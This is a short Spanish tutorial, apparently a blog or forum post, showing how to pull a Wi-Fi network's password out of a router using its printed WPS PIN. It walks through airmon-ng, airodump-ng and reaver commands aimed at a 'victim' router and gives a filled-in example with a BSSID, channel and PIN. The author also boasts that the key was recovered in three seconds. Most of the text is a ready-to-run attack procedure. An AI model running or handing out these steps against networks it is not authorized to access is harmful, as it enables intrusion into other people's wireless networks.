En la parte de atras del router (o en su caja) por lo general hay una etiqueta que indica el PIN del WPS. Este número es el que vamos a usar para conseguir la clave.
Esta prueba fue hecha usando backtrack. Pero puedes usar cualquier distro.
1- Primero debes poner tu tarjeta en modo monitor
airmon-ng start wlan0
2- Busca el bssid y el canal del router victima:
airodump-ng mon0
3- Por ultimo ejecuta reaver, el pin es el que viste en el reverso del router
reaver -i mon0 -b BSSID -c CANAL -p PIN –vv
Ejemplo (BSSID=F8:E1:21:35:26:0C ; CANAL=4 ; PIN=17057414):
reaver -i mon0 -b F8:E1:21:35:26:0C -c 4 -p 17057414 –vv
--------------------------------------------------------------------------------------
Estas son capturas de las dos únicas pruebas que he realizado (ambas exitosas):
Se puede notar que sacaron la clave en solo 3 segundos!